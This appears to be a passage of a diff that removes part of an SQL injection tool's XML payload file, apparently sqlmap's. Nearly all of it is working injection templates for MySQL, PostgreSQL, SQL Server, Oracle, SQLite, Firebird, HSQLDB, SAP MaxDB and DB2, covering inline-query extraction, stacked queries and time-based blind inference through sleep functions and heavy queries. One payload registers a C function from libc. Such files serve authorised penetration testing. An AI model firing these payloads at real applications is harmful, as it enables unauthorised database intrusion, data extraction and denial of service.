-        <title>PostgreSQL inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'||([QUERY])::text||'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))::text||'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT '[DELIMITER_START]'+([QUERY])+'[DELIMITER_STOP]')</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'+(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN '1' ELSE '0' END))+'[DELIMITER_STOP]')</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>(SELECT ('[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]') FROM DUAL)</vector>
-        <request>
-            <payload>(SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END) FROM DUAL)||'[DELIMITER_STOP]' FROM DUAL)</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite inline queries</title>
-        <stype>6</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]'</vector>
-        <request>
-            <payload>SELECT '[DELIMITER_START]'||(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END))||'[DELIMITER_STOP]'</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-        </details>
-    </test>
-    <test>
-        <title>Firebird inline queries</title>
-        <stype>6</stype>
-        <level>2</level>
-        <risk>1</risk>
-        <clause>1,2,3,8</clause>
-        <where>3</where>
-        <vector>SELECT '[DELIMITER_START]'||([QUERY])||'[DELIMITER_STOP]' FROM RDB$DATABASE</vector>
-        <request>
-            <payload>SELECT '[DELIMITER_START]'||(CASE [RANDNUM] WHEN [RANDNUM] THEN 1 ELSE 0 END)||'[DELIMITER_STOP]' FROM RDB$DATABASE</payload>
-        </request>
-        <response>
-            <grep>[DELIMITER_START](?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-        </details>
-    </test>
-    <!-- End of inline queries tests -->
-
-    <!-- Stacked queries tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>; SELECT SLEEP([SLEEPTIME])</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>; SELECT BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>-- </comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT PG_SLEEP([SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &lt; 8.2 stacked queries (Glibc)</title>
-        <stype>4</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; CREATE OR REPLACE FUNCTION SLEEP(int) RETURNS int AS '/lib/libc.so.6','sleep' language 'C' STRICT; SELECT sleep([SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&lt; 8.2</dbms_version>
-            <os>Linux</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase stacked queries</title>
-        <stype>4</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
-        <request>
-            <payload>; WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END FROM DUAL</vector>
-        <request>
-            <payload>; SELECT DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) FROM DUAL</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END FROM DUAL</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (DBMS_LOCK.SLEEP)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN DBMS_LOCK.SLEEP([SLEEPTIME]); ELSE DBMS_LOCK.SLEEP(0); END IF; END</vector>
-        <request>
-            <payload>; BEGIN DBMS_LOCK.SLEEP([SLEEPTIME]); END</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle stacked queries (USER_LOCK.SLEEP)</title>
-        <stype>4</stype>
-        <level>5</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; BEGIN IF ([INFERENCE]) THEN USER_LOCK.SLEEP([SLEEPTIME]); ELSE USER_LOCK.SLEEP(0); END IF; END</vector>
-        <request>
-            <payload>; BEGIN USER_LOCK.SLEEP([SLEEPTIME]); END</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT (CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>; SELECT LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird stacked queries (heavy query)</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>; SELECT IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM]) FROM RDB$DATABASE</vector>
-        <request>
-            <payload>; SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 1.7.2 stacked queries</title>
-        <stype>4</stype>
-        <level>3</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000) END</vector>
-        <request>
-            <payload>;CALL REPEAT(RIGHT(CHAR([RANDNUM]),0),[SLEEPTIME]00000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 1.7.2</dbms_version>
-        </details>
-    </test>
-    
-    <test>
-        <title>HSQLDB &gt;= 2.0 stacked queries</title>
-        <stype>4</stype>
-        <level>4</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>;CALL CASE WHEN ([INFERENCE]) THEN REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000) END</vector>
-        <request>
-            <payload>;CALL REPEAT(LEFT(CRYPT_KEY('AES',null),0),[SLEEPTIME]00000000)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>HSQLDB</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-    <!-- TODO: if possible, add payload for Microsoft Access and SAP MaxDB -->
-    <!-- End of stacked queries tests -->
-
-
-    <!-- AND time-based blind tests -->
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &gt; 5.0.11 AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
-        <request>
-            <payload>AND SLEEP([SLEEPTIME])</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-            <dbms_version>&gt; 5.0.11</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>MySQL &lt; 5.0.12 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IF(([INFERENCE]),BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]'))</payload>
-            <comment>#</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>MySQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL &gt; 8.1 AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME])) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT [RANDNUM] FROM PG_SLEEP([SLEEPTIME]))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-            <dbms_version>&gt; 8.1</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>PostgreSQL AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000)) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>PostgreSQL</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>0</risk>
-        <clause>0</clause>
-        <where>1</where>
-        <vector>IF([INFERENCE]) WAITFOR DELAY '0:0:[SLEEPTIME]'</vector>
-        <request>
-            <payload>WAITFOR DELAY '0:0:[SLEEPTIME]'</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Microsoft SQL Server/Sybase AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Microsoft SQL Server</dbms>
-            <dbms>Sybase</dbms>
-            <os>Windows</os>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind</title>
-        <stype>5</stype>
-        <level>1</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>1</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME]) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=DBMS_PIPE.RECEIVE_MESSAGE('[RANDSTR]',[SLEEPTIME])</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[SLEEPTIME]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>2</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>Oracle AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM ALL_USERS T1,ALL_USERS T2,ALL_USERS T3,ALL_USERS T4,ALL_USERS T5)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Oracle</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SQLite &gt; 2.0 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(CASE WHEN ([INFERENCE]) THEN (LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))) ELSE [RANDNUM] END)</vector>
-        <request>
-            <payload>AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SQLite</dbms>
-            <dbms_version>&gt; 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>4</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>Firebird AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=IIF(([INFERENCE]),(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4),[RANDNUM])</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM RDB$FIELDS AS T1,RDB$TYPES AS T2,RDB$COLLATIONS AS T3,RDB$FUNCTIONS AS T4)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>Firebird</dbms>
-            <dbms_version>&gt;= 2.0</dbms_version>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>SAP MaxDB AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM (SELECT * FROM DOMAIN.DOMAINS WHERE ([INFERENCE])) AS T1,(SELECT * FROM DOMAIN.COLUMNS WHERE ([INFERENCE])) AS T2,(SELECT * FROM DOMAIN.TABLES WHERE ([INFERENCE])) AS T3)</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM DOMAIN.DOMAINS AS T1,DOMAIN.COLUMNS AS T2,DOMAIN.TABLES AS T3)</payload>
-            <comment>--</comment>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>SAP MaxDB</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 AND time-based blind (heavy query)</title>
-        <stype>5</stype>
-        <level>3</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
-        <vector>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3 WHERE ([INFERENCE]))</vector>
-        <request>
-            <payload>AND [RANDNUM]=(SELECT COUNT(*) FROM SYSIBM.SYSTABLES AS T1,SYSIBM.SYSTABLES AS T2,SYSIBM.SYSTABLES AS T3)</payload>
-        </request>
-        <response>
-            <time>[DELAYED]</time>
-        </response>
-        <details>
-            <dbms>IBM DB2</dbms>
-        </details>
-    </test>
-
-    <test>
-        <title>IBM DB2 AND time-based blind (heavy query - comment)</title>
-        <stype>5</stype>
-        <level>5</level>
-        <risk>2</risk>
-        <clause>1,2,3</clause>
-        <where>1</where>
